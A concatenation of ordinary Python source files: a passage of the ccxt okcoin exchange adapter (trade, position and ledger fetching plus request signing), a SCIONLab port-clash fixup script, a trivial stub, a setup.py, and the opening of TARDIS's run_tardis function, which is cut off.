# "fee":"0",
# "price":"129.13",
# "size":"0.23996099", # ←--- amount
# },
#
# # market/limit buy
#
# {
# "currency":"ETH",
# "fee":"-0.00036049", # ←--- fee in received base currency
# "price":"129.16", # ←------ price
# "size":"0.240322", # ←----- amount
# },
# {
# "currency":"USDT",
# "fee":"0",
# "price":"129.16",
# "size":"31.03998952", # ←-- cost
# }
#
timestamp = self.parse8601(self.safe_string_2(userTrade, 'timestamp', 'created_at'))
takerOrMaker = self.safe_string_2(userTrade, 'exec_type', 'liquidity')
if takerOrMaker == 'M':
takerOrMaker = 'maker'
elif takerOrMaker == 'T':
takerOrMaker = 'taker'
orderId = self.safe_string(userTrade, 'order_id')
return self.safe_trade({
'info': pair,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'symbol': symbol,
'id': id,
'order': orderId,
'type': None,
'takerOrMaker': takerOrMaker,
'side': side,
'price': priceString,
'amount': amountString,
'cost': costString,
'fee': fee,
'fees': fees,
}, market)
def parse_my_trades(self, trades, market=None, since=None, limit=None, params={}):
grouped = self.group_by(trades, 'trade_id')
tradeIds = list(grouped.keys())
result = []
for i in range(0, len(tradeIds)):
tradeId = tradeIds[i]
pair = grouped[tradeId]
# make sure it has exactly 2 trades, no more, no less
numTradesInPair = len(pair)
if numTradesInPair == 2:
trade = self.parse_my_trade(pair)
result.append(trade)
market = self.safe_market(None, market)
return self.filter_by_symbol_since_limit(result, market['symbol'], since, limit)
async def fetch_my_trades(self, symbol=None, since=None, limit=None, params={}):
"""
fetch all trades made by the user
:param str symbol: unified market symbol
:param int|None since: the earliest time in ms to fetch trades for
:param int|None limit: the maximum number of trades structures to retrieve
:param dict params: extra parameters specific to the okcoin api endpoint
:returns [dict]: a list of `trade structures <https://docs.ccxt.com/en/latest/manual.html#trade-structure>`
"""
# okex actually returns ledger entries instead of fills here, so each fill in the order
# is represented by two trades with opposite buy/sell sides, not one :\
# this aspect renders the 'fills' endpoint unusable for fetchOrderTrades
# until either OKEX fixes the API or we work around this on our side somehow
if symbol is None:
raise ArgumentsRequired(self.id + ' fetchMyTrades() requires a symbol argument')
await self.load_markets()
market = self.market(symbol)
if (limit is not None) and (limit > 100):
limit = 100
request = {
'instrument_id': market['id'],
# 'order_id': id, # string
# 'after': '1', # pagination of data to return records earlier than the requested ledger_id
# 'before': '1', # pagination of data to return records newer than the requested ledger_id
# 'limit': limit, # optional, number of results per request, default = maximum = 100
}
defaultType = self.safe_string_2(self.options, 'fetchMyTrades', 'defaultType')
type = self.safe_string(params, 'type', defaultType)
query = self.omit(params, 'type')
method = type + 'GetFills'
response = await getattr(self, method)(self.extend(request, query))
#
# [
# # sell
# {
# "created_at":"2020-03-29T11:55:25.000Z",
# "currency":"USDT",
# "exec_type":"T",
# "fee":"-0.04647925",
# "instrument_id":"ETH-USDT",
# "ledger_id":"10562924353",
# "liquidity":"T",
# "order_id":"4636470489136128",
# "price":"129.13",
# "product_id":"ETH-USDT",
# "side":"buy",
# "size":"30.98616393",
# "timestamp":"2020-03-29T11:55:25.000Z",
# "trade_id":"18551601"
# },
# {
# "created_at":"2020-03-29T11:55:25.000Z",
# "currency":"ETH",
# "exec_type":"T",
# "fee":"0",
# "instrument_id":"ETH-USDT",
# "ledger_id":"10562924352",
# "liquidity":"T",
# "order_id":"4636470489136128",
# "price":"129.13",
# "product_id":"ETH-USDT",
# "side":"sell",
# "size":"0.23996099",
# "timestamp":"2020-03-29T11:55:25.000Z",
# "trade_id":"18551601"
# },
# # buy
# {
# "created_at":"2020-03-29T11:55:16.000Z",
# "currency":"ETH",
# "exec_type":"T",
# "fee":"-0.00036049",
# "instrument_id":"ETH-USDT",
# "ledger_id":"10562922669",
# "liquidity":"T",
# "order_id": "4636469894136832",
# "price":"129.16",
# "product_id":"ETH-USDT",
# "side":"buy",
# "size":"0.240322",
# "timestamp":"2020-03-29T11:55:16.000Z",
# "trade_id":"18551600"
# },
# {
# "created_at":"2020-03-29T11:55:16.000Z",
# "currency":"USDT",
# "exec_type":"T",
# "fee":"0",
# "instrument_id":"ETH-USDT",
# "ledger_id":"10562922668",
# "liquidity":"T",
# "order_id":"4636469894136832",
# "price":"129.16",
# "product_id":"ETH-USDT",
# "side":"sell",
# "size":"31.03998952",
# "timestamp":"2020-03-29T11:55:16.000Z",
# "trade_id":"18551600"
# }
# ]
#
return self.parse_my_trades(response, market, since, limit, params)
async def fetch_order_trades(self, id, symbol=None, since=None, limit=None, params={}):
"""
fetch all the trades made from a single order
:param str id: order id
:param str|None symbol: unified market symbol
:param int|None since: the earliest time in ms to fetch trades for
:param int|None limit: the maximum number of trades to retrieve
:param dict params: extra parameters specific to the okcoin api endpoint
:returns [dict]: a list of `trade structures <https://docs.ccxt.com/en/latest/manual.html#trade-structure>`
"""
request = {
# 'instrument_id': market['id'],
'order_id': id,
# 'after': '1', # return the page after the specified page number
# 'before': '1', # return the page before the specified page number
# 'limit': limit, # optional, number of results per request, default = maximum = 100
}
return await self.fetch_my_trades(symbol, since, limit, self.extend(request, params))
async def fetch_position(self, symbol, params={}):
"""
fetch data on a single open contract trade position
:param str symbol: unified market symbol of the market the position is held in, default is None
:param dict params: extra parameters specific to the okcoin api endpoint
:returns dict: a `position structure <https://docs.ccxt.com/en/latest/manual.html#position-structure>`
"""
await self.load_markets()
market = self.market(symbol)
method = None
request = {
'instrument_id': market['id'],
# 'order_id': id, # string
# 'after': '1', # pagination of data to return records earlier than the requested ledger_id
# 'before': '1', # pagination of data to return records newer than the requested ledger_id
# 'limit': limit, # optional, number of results per request, default = maximum = 100
}
type = market['type']
if (type == 'futures') or (type == 'swap'):
method = type + 'GetInstrumentIdPosition'
elif type == 'option':
underlying = self.safe_string(params, 'underlying')
if underlying is None:
raise ArgumentsRequired(self.id + ' fetchPosition() requires an underlying parameter for ' + type + ' market ' + symbol)
method = type + 'GetUnderlyingPosition'
else:
raise NotSupported(self.id + ' fetchPosition() does not support ' + type + ' market ' + symbol + ', supported market types are futures, swap or option')
response = await getattr(self, method)(self.extend(request, params))
#
# futures
#
# crossed margin mode
#
# {
# "result": True,
# "holding": [
# {
# "long_qty": "2",
# "long_avail_qty": "2",
# "long_avg_cost": "8260",
# "long_settlement_price": "8260",
# "realised_pnl": "0.00020928",
# "short_qty": "2",
# "short_avail_qty": "2",
# "short_avg_cost": "8259.99",
# "short_settlement_price": "8259.99",
# "liquidation_price": "113.81",
# "instrument_id": "BTC-USD-191227",
# "leverage": "10",
# "created_at": "2019-09-25T07:58:42.129Z",
# "updated_at": "2019-10-08T14:02:51.029Z",
# "margin_mode": "crossed",
# "short_margin": "0.00242197",
# "short_pnl": "6.63E-6",
# "short_pnl_ratio": "0.002477997",
# "short_unrealised_pnl": "6.63E-6",
# "long_margin": "0.00242197",
# "long_pnl": "-6.65E-6",
# "long_pnl_ratio": "-0.002478",
# "long_unrealised_pnl": "-6.65E-6",
# "long_settled_pnl": "0",
# "short_settled_pnl": "0",
# "last": "8257.57"
# }
# ],
# "margin_mode": "crossed"
# }
#
# fixed margin mode
#
# {
# "result": True,
# "holding": [
# {
# "long_qty": "4",
# "long_avail_qty": "4",
# "long_margin": "0.00323844",
# "long_liqui_price": "7762.09",
# "long_pnl_ratio": "0.06052306",
# "long_avg_cost": "8234.43",
# "long_settlement_price": "8234.43",
# "realised_pnl": "-0.00000296",
# "short_qty": "2",
# "short_avail_qty": "2",
# "short_margin": "0.00241105",
# "short_liqui_price": "9166.74",
# "short_pnl_ratio": "0.03318052",
# "short_avg_cost": "8295.13",
# "short_settlement_price": "8295.13",
# "instrument_id": "BTC-USD-191227",
# "long_leverage": "15",
# "short_leverage": "10",
# "created_at": "2019-09-25T07:58:42.129Z",
# "updated_at": "2019-10-08T13:12:09.438Z",
# "margin_mode": "fixed",
# "short_margin_ratio": "0.10292507",
# "short_maint_margin_ratio": "0.005",
# "short_pnl": "7.853E-5",
# "short_unrealised_pnl": "7.853E-5",
# "long_margin_ratio": "0.07103743",
# "long_maint_margin_ratio": "0.005",
# "long_pnl": "1.9841E-4",
# "long_unrealised_pnl": "1.9841E-4",
# "long_settled_pnl": "0",
# "short_settled_pnl": "0",
# "last": "8266.99"
# }
# ],
# "margin_mode": "fixed"
# }
#
# swap
#
# crossed margin mode
#
# {
# "margin_mode": "crossed",
# "timestamp": "2019-09-27T03:49:02.018Z",
# "holding": [
# {
# "avail_position": "3",
# "avg_cost": "59.49",
# "instrument_id": "LTC-USD-SWAP",
# "last": "55.98",
# "leverage": "10.00",
# "liquidation_price": "4.37",
# "maint_margin_ratio": "0.0100",
# "margin": "0.0536",
# "position": "3",
# "realized_pnl": "0.0000",
# "unrealized_pnl": "0",
# "settled_pnl": "-0.0330",
# "settlement_price": "55.84",
# "side": "long",
# "timestamp": "2019-09-27T03:49:02.018Z"
# },
# ]
# }
#
# fixed margin mode
#
# {
# "margin_mode": "fixed",
# "timestamp": "2019-09-27T03:47:37.230Z",
# "holding": [
# {
# "avail_position": "20",
# "avg_cost": "8025.0",
# "instrument_id": "BTC-USD-SWAP",
# "last": "8113.1",
# "leverage": "15.00",
# "liquidation_price": "7002.6",
# "maint_margin_ratio": "0.0050",
# "margin": "0.0454",
# "position": "20",
# "realized_pnl": "-0.0001",
# "unrealized_pnl": "0",
# "settled_pnl": "0.0076",
# "settlement_price": "8279.2",
# "side": "long",
# "timestamp": "2019-09-27T03:47:37.230Z"
# }
# ]
# }
#
# option
#
# {
# "holding":[
# {
# "instrument_id":"BTC-USD-190927-12500-C",
# "position":"20",
# "avg_cost":"3.26",
# "avail_position":"20",
# "settlement_price":"0.017",
# "total_pnl":"50",
# "pnl_ratio":"0.3",
# "realized_pnl":"40",
# "unrealized_pnl":"10",
# "pos_margin":"100",
# "option_value":"70",
# "created_at":"2019-08-30T03:09:20.315Z",
# "updated_at":"2019-08-30T03:40:18.318Z"
# },
# {
# "instrument_id":"BTC-USD-190927-12500-P",
# "position":"20",
# "avg_cost":"3.26",
# "avail_position":"20",
# "settlement_price":"0.019",
# "total_pnl":"50",
# "pnl_ratio":"0.3",
# "realized_pnl":"40",
# "unrealized_pnl":"10",
# "pos_margin":"100",
# "option_value":"70",
# "created_at":"2019-08-30T03:09:20.315Z",
# "updated_at":"2019-08-30T03:40:18.318Z"
# }
# ]
# }
#
# todo unify parsePosition/parsePositions
return response
async def fetch_positions(self, symbols=None, params={}):
"""
fetch all open positions
:param [str]|None symbols: not used by okcoin fetchPositions
:param dict params: extra parameters specific to the okcoin api endpoint
:returns [dict]: a list of `position structure <https://docs.ccxt.com/en/latest/manual.html#position-structure>`
"""
await self.load_markets()
method = None
defaultType = self.safe_string_2(self.options, 'fetchPositions', 'defaultType')
type = self.safe_string(params, 'type', defaultType)
if (type == 'futures') or (type == 'swap'):
method = type + 'GetPosition'
elif type == 'option':
underlying = self.safe_string(params, 'underlying')
if underlying is None:
raise ArgumentsRequired(self.id + ' fetchPositions() requires an underlying parameter for ' + type + ' markets')
method = type + 'GetUnderlyingPosition'
else:
raise NotSupported(self.id + ' fetchPositions() does not support ' + type + ' markets, supported market types are futures, swap or option')
params = self.omit(params, 'type')
response = await getattr(self, method)(params)
#
# futures
#
# ...
#
#
# swap
#
# ...
#
# option
#
# {
# "holding":[
# {
# "instrument_id":"BTC-USD-190927-12500-C",
# "position":"20",
# "avg_cost":"3.26",
# "avail_position":"20",
# "settlement_price":"0.017",
# "total_pnl":"50",
# "pnl_ratio":"0.3",
# "realized_pnl":"40",
# "unrealized_pnl":"10",
# "pos_margin":"100",
# "option_value":"70",
# "created_at":"2019-08-30T03:09:20.315Z",
# "updated_at":"2019-08-30T03:40:18.318Z"
# },
# {
# "instrument_id":"BTC-USD-190927-12500-P",
# "position":"20",
# "avg_cost":"3.26",
# "avail_position":"20",
# "settlement_price":"0.019",
# "total_pnl":"50",
# "pnl_ratio":"0.3",
# "realized_pnl":"40",
# "unrealized_pnl":"10",
# "pos_margin":"100",
# "option_value":"70",
# "created_at":"2019-08-30T03:09:20.315Z",
# "updated_at":"2019-08-30T03:40:18.318Z"
# }
# ]
# }
#
# todo unify parsePosition/parsePositions
return response
async def fetch_ledger(self, code=None, since=None, limit=None, params={}):
await self.load_markets()
defaultType = self.safe_string_2(self.options, 'fetchLedger', 'defaultType')
type = self.safe_string(params, 'type', defaultType)
query = self.omit(params, 'type')
suffix = '' if (type == 'account') else 'Accounts'
argument = ''
request = {
# 'from': 'id',
# 'to': 'id',
}
if limit is not None:
request['limit'] = limit
currency = None
if type == 'spot':
if code is None:
raise ArgumentsRequired(self.id + " fetchLedger() requires a currency code argument for '" + type + "' markets")
argument = 'Currency'
currency = self.currency(code)
request['currency'] = currency['id']
elif type == 'futures':
if code is None:
raise ArgumentsRequired(self.id + " fetchLedger() requires an underlying symbol for '" + type + "' markets")
argument = 'Underlying'
market = self.market(code) # we intentionally put a market inside here for the margin and swap ledgers
marketInfo = self.safe_value(market, 'info', {})
settlementCurrencyId = self.safe_string(marketInfo, 'settlement_currency')
settlementCurrencyCode = self.safe_currency_code(settlementCurrencyId)
currency = self.currency(settlementCurrencyCode)
underlyingId = self.safe_string(marketInfo, 'underlying')
request['underlying'] = underlyingId
elif (type == 'margin') or (type == 'swap'):
if code is None:
raise ArgumentsRequired(self.id + " fetchLedger() requires a code argument(a market symbol) for '" + type + "' markets")
argument = 'InstrumentId'
market = self.market(code) # we intentionally put a market inside here for the margin and swap ledgers
currency = self.currency(market['base'])
request['instrument_id'] = market['id']
#
# if type == 'margin':
# #
# # 3. Borrow
# # 4. Repayment
# # 5. Interest
# # 7. Buy
# # 8. Sell
# # 9. From capital account
# # 10. From C2C
# # 11. From Futures
# # 12. From Spot
# # 13. From ETT
# # 14. To capital account
# # 15. To C2C
# # 16. To Spot
# # 17. To Futures
# # 18. To ETT
# # 19. Mandatory Repayment
# # 20. From Piggybank
# # 21. To Piggybank
# # 22. From Perpetual
# # 23. To Perpetual
# # 24. Liquidation Fee
# # 54. Clawback
# # 59. Airdrop Return.
# #
#         request['type'] = 'number' # All types will be returned if this field is left blank
# }
#
elif type == 'account':
if code is not None:
currency = self.currency(code)
request['currency'] = currency['id']
#
# #
# # 1. deposit
# # 2. withdrawal
# # 13. cancel withdrawal
# # 18. into futures account
# # 19. out of futures account
# # 20. into sub account
# # 21. out of sub account
# # 28. claim
# # 29. into ETT account
# # 30. out of ETT account
# # 31. into C2C account
# # 32. out of C2C account
# # 33. into margin account
# # 34. out of margin account
# # 37. into spot account
# # 38. out of spot account
# #
# request['type'] = 'number'
#
else:
raise NotSupported(self.id + " fetchLedger does not support the '" + type + "' type(the type must be one of 'account', 'spot', 'margin', 'futures', 'swap')")
method = type + 'Get' + suffix + argument + 'Ledger'
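# the method name is assembled from the parts above, e.g.(string concatenation only):
# type='spot' -> 'spotGetAccountsCurrencyLedger', type='account' -> 'accountGetLedger',
# type='futures' -> 'futuresGetAccountsUnderlyingLedger'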
response = await getattr(self, method)(self.extend(request, query))
#
# transfer funds transfer in/out
# trade funds moved as a result of a trade, spot and margin accounts only
# rebate fee rebate as per fee schedule, spot and margin accounts only
# match open long/open short/close long/close short(futures) or a change in the amount because of trades(swap)
# fee fee, futures only
# settlement settlement/clawback/settle long/settle short
# liquidation force close long/force close short/deliver close long/deliver close short
# funding funding fee, swap only
# margin a change in the amount after adjusting margin, swap only
#
# account
#
# [
# {
# "amount":0.00051843,
# "balance":0.00100941,
# "currency":"BTC",
# "fee":0,
# "ledger_id":8987285,
# "timestamp":"2018-10-12T11:01:14.000Z",
# "typename":"Get from activity"
# }
# ]
#
# spot
#
# [
# {
# "timestamp":"2019-03-18T07:08:25.000Z",
# "ledger_id":"3995334780",
# "created_at":"2019-03-18T07:08:25.000Z",
# "currency":"BTC",
# "amount":"0.0009985",
# "balance":"0.0029955",
# "type":"trade",
# "details":{
# "instrument_id":"BTC-USDT",
# "order_id":"2500650881647616",
# "product_id":"BTC-USDT"
# }
# }
# ]
#
# margin
#
# [
# [
# {
# "created_at":"2019-03-20T03:45:05.000Z",
# "ledger_id":"78918186",
# "timestamp":"2019-03-20T03:45:05.000Z",
# "currency":"EOS",
# "amount":"0", # ?
# "balance":"0.59957711",
# "type":"transfer",
# "details":{
# "instrument_id":"EOS-USDT",
# "order_id":"787057",
# "product_id":"EOS-USDT"
# }
# }
# ],
# {
# "before":"78965766",
# "after":"78918186"
# }
# ]
#
# futures
#
# [
# {
# "ledger_id":"2508090544914461",
# "timestamp":"2019-03-19T14:40:24.000Z",
# "amount":"-0.00529521",
# "balance":"0",
# "currency":"EOS",
# "type":"fee",
# "details":{
# "order_id":"2506982456445952",
# "instrument_id":"EOS-USD-190628"
# }
# }
# ]
#
# swap
#
# [
# {
# "amount":"0.004742",
# "fee":"-0.000551",
# "type":"match",
# "instrument_id":"EOS-USD-SWAP",
# "ledger_id":"197429674941902848",
# "timestamp":"2019-03-25T05:56:31.286Z"
# },
# ]
#
responseLength = len(response)
if responseLength < 1:
return []
isArray = isinstance(response[0], list)
isMargin = (type == 'margin')
entries = response[0] if (isMargin and isArray) else response
if type == 'swap':
ledgerEntries = self.parse_ledger(entries)
return self.filter_by_symbol_since_limit(ledgerEntries, code, since, limit)
return self.parse_ledger(entries, currency, since, limit)
def parse_ledger_entry_type(self, type):
types = {
'transfer': 'transfer', # # funds transfer in/out
'trade': 'trade', # funds moved as a result of a trade, spot and margin accounts only
'rebate': 'rebate', # fee rebate as per fee schedule, spot and margin accounts only
'match': 'trade', # open long/open short/close long/close short(futures) or a change in the amount because of trades(swap)
'fee': 'fee', # fee, futures only
'settlement': 'trade', # settlement/clawback/settle long/settle short
'liquidation': 'trade', # force close long/force close short/deliver close long/deliver close short
'funding': 'fee', # funding fee, swap only
'margin': 'margin', # a change in the amount after adjusting margin, swap only
}
return self.safe_string(types, type, type)
def parse_ledger_entry(self, item, currency=None):
#
#
# account
#
# {
# "amount":0.00051843,
# "balance":0.00100941,
# "currency":"BTC",
# "fee":0,
# "ledger_id":8987285,
# "timestamp":"2018-10-12T11:01:14.000Z",
# "typename":"Get from activity"
# }
#
# spot
#
# {
# "timestamp":"2019-03-18T07:08:25.000Z",
# "ledger_id":"3995334780",
# "created_at":"2019-03-18T07:08:25.000Z",
# "currency":"BTC",
# "amount":"0.0009985",
# "balance":"0.0029955",
# "type":"trade",
# "details":{
# "instrument_id":"BTC-USDT",
# "order_id":"2500650881647616",
# "product_id":"BTC-USDT"
# }
# }
#
# margin
#
# {
# "created_at":"2019-03-20T03:45:05.000Z",
# "ledger_id":"78918186",
# "timestamp":"2019-03-20T03:45:05.000Z",
# "currency":"EOS",
# "amount":"0", # ?
# "balance":"0.59957711",
# "type":"transfer",
# "details":{
# "instrument_id":"EOS-USDT",
# "order_id":"787057",
# "product_id":"EOS-USDT"
# }
# }
#
# futures
#
# {
# "ledger_id":"2508090544914461",
# "timestamp":"2019-03-19T14:40:24.000Z",
# "amount":"-0.00529521",
# "balance":"0",
# "currency":"EOS",
# "type":"fee",
# "details":{
# "order_id":"2506982456445952",
# "instrument_id":"EOS-USD-190628"
# }
# }
#
# swap
#
# {
# "amount":"0.004742",
# "fee":"-0.000551",
# "type":"match",
# "instrument_id":"EOS-USD-SWAP",
# "ledger_id":"197429674941902848",
# "timestamp":"2019-03-25T05:56:31.286Z"
# },
#
id = self.safe_string(item, 'ledger_id')
account = None
details = self.safe_value(item, 'details', {})
referenceId = self.safe_string(details, 'order_id')
referenceAccount = None
type = self.parse_ledger_entry_type(self.safe_string(item, 'type'))
code = self.safe_currency_code(self.safe_string(item, 'currency'), currency)
amount = self.safe_number(item, 'amount')
timestamp = self.parse8601(self.safe_string(item, 'timestamp'))
fee = {
'cost': self.safe_number(item, 'fee'),
'currency': code,
}
before = None
after = self.safe_number(item, 'balance')
status = 'ok'
marketId = self.safe_string(item, 'instrument_id')
symbol = None
if marketId in self.markets_by_id:
market = self.markets_by_id[marketId]
symbol = market['symbol']
return {
'info': item,
'id': id,
'account': account,
'referenceId': referenceId,
'referenceAccount': referenceAccount,
'type': type,
'currency': code,
'symbol': symbol,
'amount': amount,
'before': before, # balance before
'after': after, # balance after
'status': status,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'fee': fee,
}
def sign(self, path, api='public', method='GET', params={}, headers=None, body=None):
isArray = isinstance(params, list)
request = '/api/' + api + '/' + self.version + '/'
request += path if isArray else self.implode_params(path, params)
query = params if isArray else self.omit(params, self.extract_params(path))
url = self.implode_hostname(self.urls['api']['rest']) + request
type = self.get_path_authentication_type(path)
if (type == 'public') or (type == 'information'):
if query:
url += '?' + self.urlencode(query)
elif type == 'private':
self.check_required_credentials()
timestamp = self.iso8601(self.milliseconds())
headers = {
'OK-ACCESS-KEY': self.apiKey,
'OK-ACCESS-PASSPHRASE': self.password,
'OK-ACCESS-TIMESTAMP': timestamp,
# 'OK-FROM': '',
# 'OK-TO': '',
# 'OK-LIMIT': '',
}
auth = timestamp + method + request
if method == 'GET':
if query:
urlencodedQuery = '?' + self.urlencode(query)
url += urlencodedQuery
auth += urlencodedQuery
else:
if isArray or query:
body = self.json(query)
auth += body
headers['Content-Type'] = 'application/json'
signature = self.hmac(self.encode(auth), self.encode(self.secret), hashlib.sha256, 'base64')
headers['OK-ACCESS-SIGN'] = signature
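# signature sketch: the prehash string is the iso8601 timestamp + HTTP method + request path,
# plus '?query' for GET requests or the JSON body otherwise, e.g.(hypothetical values):
# '2019-03-25T03:46:10.336Z' + 'GET' + '/api/spot/v3/accounts', signed with HMAC-SHA256 of the secret and base64-encoded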
return {'url': url, 'method': method, 'body': body, 'headers': headers}
def get_path_authentication_type(self, path):
# https://github.com/ccxt/ccxt/issues/6651
# a special case to handle the optionGetUnderlying interfering with
# other endpoints containing this keyword
if path == 'underlying':
return 'public'
auth = self.safe_value(self.options, 'auth', {})
key = self.find_broadly_matched_key(auth, path)
return self.safe_string(auth, key, 'private')
def handle_errors(self, code, reason, url, method, headers, body, response, requestHeaders, requestBody):
if not response:
return # fallback to default error handler
feedback = self.id + ' ' + body
if code == 503:
# {"message":"name resolution failed"}
raise ExchangeNotAvailable(feedback)
#
# {"error_message":"Order does not exist","result":"true","error_code":"35029","order_id":"-1"}
#
message = self.safe_string(response, 'message')
errorCode = self.safe_string_2(response, 'code', 'error_code')
nonEmptyMessage = ((message is not None) and (message != ''))
nonZeroErrorCode = (errorCode is not None) and (errorCode != '0')
if nonEmptyMessage:
self.throw_exactly_matched_exception(self.exceptions['exact'], message, feedback)
self.throw_broadly_matched_exception(self.exceptions['broad'], message, feedback)
if nonZeroErrorCode:
self.throw_exactly_matched_exception(self.exceptions['exact'], errorCode, feedback)
if nonZeroErrorCode or nonEmptyMessage:
raise ExchangeError(feedback) # unknown message
|
py | b40411cc8da84a156c2c0a4a35191613b4c901cb | #!/usr/bin/env python3
# Copyright 2020 ETH Zurich
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
:mod:`scripts.port_clash_fixup`
===============================
Prints existing port clashes and fixes them.
For every clash, the interface that was modified first is kept, but
for all the other ones a new port is found, and the associated
AP's configuration version is bumped.
This is intended to be used only once.
Run with python manage.py runscript port_clash_fixup
"""
from collections import defaultdict
from django.db import transaction
from scionlab.models.core import Host, Interface
def run():
# get the clashes:
clashes = dict()
for h in Host.objects.all():
c = get_clashes(h)
if len(c):
clashes[h] = c
# print them
for k, v in clashes.items():
print('host {host} has {clashes} clashes:'.format(
host=k, clashes=len(v)))
for c in v:
print('\tsocket = {socket} IDs = {ids}'.format(socket=c[0], ids=c[1]))
# fix them
for clashes in clashes.values():
for c in clashes:
fix_clash(c[1])
def get_clashes(host):
"""
returns a list of (socket,[list_of_ids])
"""
sockets = defaultdict(list)
for iface in Interface.objects.filter(host=host):
socket = (iface.get_public_ip(), iface.public_port)
sockets[socket].append(iface.pk)
clashes = list()
for k, v in sockets.items():
if len(v) > 1:
clashes.append((k, v))
return clashes
@transaction.atomic
def fix_clash(iface_ids):
"""
    sorts the interfaces by modification date of the user AS,
keeps the interface for the oldest modified user AS, and for the remaining interfaces
selects a new port and bumps the configuration for the user AS host
"""
ifaces = Interface.objects.\
filter(pk__in=iface_ids).\
order_by('-link_as_interfaceA__interfaceB__AS__modified_date')
# don't modify the AS that obtained that port the first
ifaces = ifaces[:len(ifaces)-1]
for iface in ifaces:
iface.public_port = iface.host.find_public_port()
iface.save()
iface.host.bump_config()
|
py | b404124e20300527775033aedb15760dd661cc3c | # Standard ear-reference
import numpy as np
def ear_reference(data):
return data
|
py | b404133dc455d3af035e0832fd933c69627e3b05 | from pkg_resources import parse_version
from configparser import ConfigParser
import setuptools
assert parse_version(setuptools.__version__)>=parse_version('36.2')
# note: all settings are in settings.ini; edit there, not here
config = ConfigParser(delimiters=['='])
config.read('settings.ini')
config = config['DEFAULT']
config_keys = 'version description keywords author author_email'.split()
expected = config_keys + "lib_name user branch license status min_python audience language".split()
for setting in expected:
assert setting in config, f"missing expected setting: {setting}"
setup_config = {setting:config[setting] for setting in config_keys}
licenses = {
'apache2': ('Apache Software License 2.0','OSI Approved :: Apache Software License'),
}
statuses = [ '1 - Planning', '2 - Pre-Alpha', '3 - Alpha',
'4 - Beta', '5 - Production/Stable', '6 - Mature', '7 - Inactive' ]
py_versions = '2.0 2.1 2.2 2.3 2.4 2.5 2.6 2.7 3.0 3.1 3.2 3.3 3.4 3.5 3.6 3.7 3.8 3.9'.split()
requirements = config.get('requirements','').split()
lic = licenses[config['license']]
min_python = config['min_python']
setuptools.setup(
name = config['lib_name'],
license = lic[0],
classifiers = [
'Development Status :: ' + statuses[int(config['status'])],
'Intended Audience :: ' + config['audience'].title(),
'License :: ' + lic[1],
'Natural Language :: ' + config['language'].title(),
] + [f'Programming Language :: Python :: {version}' for version in py_versions[py_versions.index(min_python):]],
url = config['git_url'],
packages = setuptools.find_packages(),
include_package_data = True,
install_requires = requirements,
dependency_links = config.get('dep_links','').split(),
python_requires = '>=' + config['min_python'],
long_description = open('README.md').read(),
long_description_content_type = 'text/markdown',
zip_safe = False,
entry_points = { 'console_scripts': config.get('console_scripts','').split() },
**setup_config)
|
py | b404145f29605f9b522d6928c04d6281d853ff5b | # Functions that are important for the general usage of TARDIS.
import logging
logger = logging.getLogger(__name__)
def run_tardis(
config,
atom_data=None,
packet_source=None,
simulation_callbacks=[],
virtual_packet_logging=False,
show_convergence_plots=True,
log_level=None,
specific_log_level=None,
show_progress_bars=True,
**kwargs,
):
"""
Run TARDIS from a given config object.
It will return a model object containing the TARDIS Simulation.
Parameters
----------
config : str or dict or tardis.io.config_reader.Configuration
filename of configuration yaml file or dictionary or TARDIS Configuration object
atom_data : str or tardis.atomic.AtomData, optional
If atom_data is a string it is interpreted as a path to a file storing
the atomic data. Atomic data to use for this TARDIS simulation. If set to None (i.e. default),
the atomic data will be loaded according to keywords set in the configuration
packet_source : class, optional
A custom packet source class or a child class of `tardis.montecarlo.packet_source`
used to override the TARDIS `BasePacketSource` class.
simulation_callbacks : list of lists, default: `[]`, optional
Set of callbacks to call at the end of every iteration of the Simulation.
The format of the lists should look like:
[[callback1, callback_arg1], [callback2, callback_arg2], ...],
where the callback function signature should look like:
callback_function(simulation, extra_arg1, ...)
virtual_packet_logging : bool, default: False, optional
Option to enable virtual packet logging.
log_level : {'NOTSET', 'DEBUG', 'INFO', 'WARNING', 'ERROR', 'CRITICAL'}, default: None, optional
Set the level of the TARDIS logger (follows native python logging framework log levels).
Use this parameter to override the `log_level` specified in the configuration file.
The default value `None` means that the `log_level` specified in the configuration file will be used.
specific_log_level : bool, default: None, optional
Allows to set specific logging levels, overriding the value in the configuration file.
If True, only show the log messages from a particular log level, set by `log_level`.
If False, the logger shows log messages belonging to the level set and all levels above it in severity.
The default value None means that the `specific_log_level` specified in the configuration file will be used.
show_convergence_plots : bool, default: True, optional
Option to enable tardis convergence plots.
show_progress_bars : bool, default: True, optional
Option to enable the progress bar.
**kwargs : dict, optional
Optional keyword arguments including those
supported by :obj:`tardis.visualization.tools.convergence_plot.ConvergencePlots`.
Returns
-------
tardis.simulation.Simulation
Notes
-----
    Please see the `logging tutorial <https://tardis-sn.github.io/tardis/io/optional/logging_configuration.html>`_ to learn more about the `log_level` and `specific_log_level` options.
"""
from tardis.io.logger.logger import logging_state
from tardis.io.config_reader import Configuration
from tardis.io.atom_data.base import AtomData
from tardis.simulation import Simulation
if isinstance(config, Configuration):
tardis_config = config
else:
try:
tardis_config = Configuration.from_yaml(config)
except TypeError:
logger.debug(
"TARDIS Config not available via YAML. Reading through TARDIS Config Dictionary"
)
tardis_config = Configuration.from_config_dict(config)
if not isinstance(show_convergence_plots, bool):
raise TypeError("Expected bool in show_convergence_plots argument")
logging_state(log_level, tardis_config, specific_log_level)
if atom_data is not None:
try:
atom_data = AtomData.from_hdf(atom_data)
except TypeError:
logger.debug(
"Atom Data Cannot be Read from HDF. Setting to Default Atom Data"
)
atom_data = atom_data
simulation = Simulation.from_config(
tardis_config,
packet_source=packet_source,
atom_data=atom_data,
virtual_packet_logging=virtual_packet_logging,
show_convergence_plots=show_convergence_plots,
show_progress_bars=show_progress_bars,
**kwargs,
)
for cb in simulation_callbacks:
simulation.add_callback(*cb)
simulation.run()
return simulation
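# --- Editor's usage sketch (not part of the original module) ---
# Minimal illustration of calling run_tardis with a per-iteration callback in
# the documented [[callback, extra_arg], ...] format. The YAML filename below
# is an assumption; any valid TARDIS configuration file would work.
if __name__ == "__main__":
    def _log_iteration(sim, label):
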